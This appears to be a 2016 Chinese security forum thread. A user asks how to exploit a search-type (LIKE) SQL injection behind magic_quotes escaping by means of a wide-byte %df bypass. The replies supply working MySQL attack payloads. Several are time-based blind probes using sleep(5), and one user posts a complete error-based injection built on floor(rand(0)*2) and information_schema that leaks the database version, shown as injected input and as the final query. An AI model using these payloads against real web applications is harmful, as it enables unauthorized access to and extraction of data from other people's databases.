当宽字节遇到了搜索型注入还能注入么？

例如语句

select * from is_num where (id like '%注入点%')


注入点可控，但开了gpc。。想到%df，并且可以绕过，闭合了单引号

select * from is_num where (id like '%a%運'')

成了这样的。。
那么问题来了。

原语句'%test%'如果变成'%test%運'这样是出错的（%和'之间多了一个字符）。该怎么解决？？


刚写的时候忘了悬赏，能解决的wb感谢

收藏 感谢(0)

分享到： 0

12 个回复

1. 
   1# 好基友一辈子 | 2016-02-26 17:10

   mysql> select * from is_num where ((id like '%31206722%'))/**/and/**/sleep/**/(5
);
Empty set (10.00 sec)

mysql> select * from is_num where ((id like '%31206722%hh'))/**/and/**/sleep/**/
(5);
Empty set (0.00 sec)
   
   本地环境试了一下。。错误。。

2. 
   2# 风情万种 (JJ好痒) | 2016-02-26 17:53

   好像没办法 我曾试过同样的问题

3. 
   3# mramydnei (一个逗逼运维) | 2016-02-26 18:12

   你的例子有问题。模糊查询不用以%结束。插入后不该是 '%sql运'%'么？

4. 
   4# null_z | 2016-02-26 18:12

   一定用and么

5. 
   5# 玉林嘎 | 2016-02-26 18:21

   注入点明明在%%中间 咋会被你玩成'%a%運''

6. 
   6# 好基友一辈子 | 2016-02-26 18:29

   @玉林嘎 @mramydnei 嗯嗯 手残写错了。。 大妞们理解就好 是m哥说的那样。

7. 
   7# 好基友一辈子 | 2016-02-26 18:32

   @null_z 这个一般确实可以，但是如果把運加进去
   
   mysql> select * from is_num where (id like '%111dd運')xor if (now()=sysdate(),sleep(5),1);#%');
Empty set (0.00 sec)

8. 
   8# null_z | 2016-02-26 18:39

   @好基友一辈子

9. 
   9# 好基友一辈子 | 2016-02-26 18:45

   @null_z mysql> select host from mysql.user where (host like '%ldh運')xor if (now()=sysda
te(),sleep(5),1);#%');
Empty set (0.00 sec)
   
   是不是环境问题

10. 
    10# HRay (018) | 2016-02-26 19:29

    请在输入框输入如下内容運' and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))#这里不知道你是否确定where后面加了括号，一般是不带括号的，如果没有括号就是運' and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

11. 
    11# HRay (018) | 2016-02-26 19:31

    按照lz给的语句，入库后就变成了select * from is_num where (id like '%運' and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))#%')把后面的注释掉就好了

12. 
    12#

    回复此人 感谢

    komas | 2016-02-27 12:13

    宽字符大多都出现在keyword字段上也就当然能注入了